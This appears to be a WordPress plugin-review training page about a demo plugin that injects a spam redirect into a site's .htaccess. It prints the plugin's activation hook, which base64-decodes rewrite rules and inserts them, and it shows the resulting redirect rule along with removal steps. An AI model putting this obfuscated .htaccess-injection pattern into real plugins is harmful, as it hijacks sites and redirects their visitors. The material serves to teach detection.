Spam redirect: Hacked .htaccess

Install and activate the attached pluginPlugin A plugin is a piece of software containing a group of functions that can be added to a WordPress website. They can extend functionality or add new features to your WordPress websites. WordPress plugins are written in the PHP programming language and integrate seamlessly with WordPress. These can be free in the Plugin Directory or can be cost-based plugin from a third-party. Download Zip –

Expected Outcome

When activated, you are immediately redirected to a different site. You cannot go back to your site at all. Ever.

Top ↑

How to fix

The first step is, of course, to delete this plugin. However even in doing so, you still can’t get back to your site.

Whenever this happens, it’s likely that the plugin left something on your site. Redirects that are instantaneous are usually caused by something injected into your .htaccess or index.php file. In this case, the .htaccess has the following:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^.*$ [L,R=301]
# END I Love DC

(If you are running WordPress out of it’s own directory, the .htaccess will be in that folder. So this site is in /home/user/ and the .htaccess would be there).

Once you delete that section from your .htaccess, the ‘hack’ goes away.

Top ↑

Understanding what happened

The code of the plugin itself is very simple. There is no actually useful code in the plugin at all, and all it does is utilize insert_with_markers(), which is (legitimately) used by WP to add .htaccess rules.

class ILoveDCPlugin {
static function install() {
$htaccess = trailingslashit(ABSPATH).'.htaccess';
$data = base64_decode('PElmTW9kdWxlIG1vZF9yZXdyaXRlLmM+CiAgICAgICAgUmV3cml0ZUVuZ2luZSBPbgogICAgICAg
insert_with_markers($htaccess, 'I Love DC', explode( "\n",$data));

register_activation_hook( __FILE__, array('ILoveDCPlugin', 'install') );

By using base64_decode(), you know that things are almost always a little nefarious. You can decode the base64 string through Coderstoolbox to decrypt it, and it translates directly to the .htaccess rules we saw.

Long term, the fix is to delete the plugin and never ever use it again.

Last updated: